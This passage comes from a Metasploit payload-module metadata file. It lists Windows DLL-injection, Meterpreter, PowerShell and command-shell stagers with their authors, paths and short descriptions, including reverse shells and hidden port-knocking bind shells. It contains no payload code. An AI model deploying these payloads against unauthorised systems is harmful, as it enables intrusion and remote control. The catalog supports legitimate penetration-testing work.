"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp": {
"name": "Windows Inject DLL, Reverse TCP Stager",
"full_name": "payload/windows/patchupdllinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_allports": {
"name": "Windows Inject DLL, Reverse All-Port TCP Stager",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_dns": {
"name": "Windows Inject DLL, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_rc4": {
"name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_rc4_dns": {
"name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_uuid": {
"name": "Windows Inject DLL, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_udp": {
"name": "Windows Inject DLL, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/patchupdllinject/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_hidden_ipknock_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_hidden_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_ipv6_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_ipv6_tcp_uuid": {
"name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_named_pipe": {
"name": "Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/patchupmeterpreter/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"UserExistsError"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_nonx_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupmeterpreter/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_tcp_rc4": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupmeterpreter/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_tcp_uuid": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/find_tag": {
"name": "Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager",
"full_name": "payload/windows/patchupmeterpreter/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>"
],
"description": "Inject the meterpreter server DLL (staged). Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_ipv6_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/patchupmeterpreter/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_nonx_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupmeterpreter/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_ord_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupmeterpreter/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_allports": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_dns": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_rc4": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_rc4_dns": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_uuid": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_udp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/patchupmeterpreter/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/powershell_bind_tcp": {
"name": "Windows Interactive Powershell Session, Bind TCP",
"full_name": "payload/windows/powershell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/powershell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/powershell_reverse_tcp": {
"name": "Windows Interactive Powershell Session, Reverse TCP",
"full_name": "payload/windows/powershell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/powershell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_hidden_ipknock_tcp": {
"name": "Windows Command Shell, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/shell/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_hidden_tcp": {
"name": "Windows Command Shell, Hidden Bind TCP Stager",
"full_name": "payload/windows/shell/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_ipv6_tcp": {
"name": "Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_ipv6_tcp_uuid": {
"name": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/shell/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_named_pipe": {
"name": "Windows Command Shell, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/shell/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
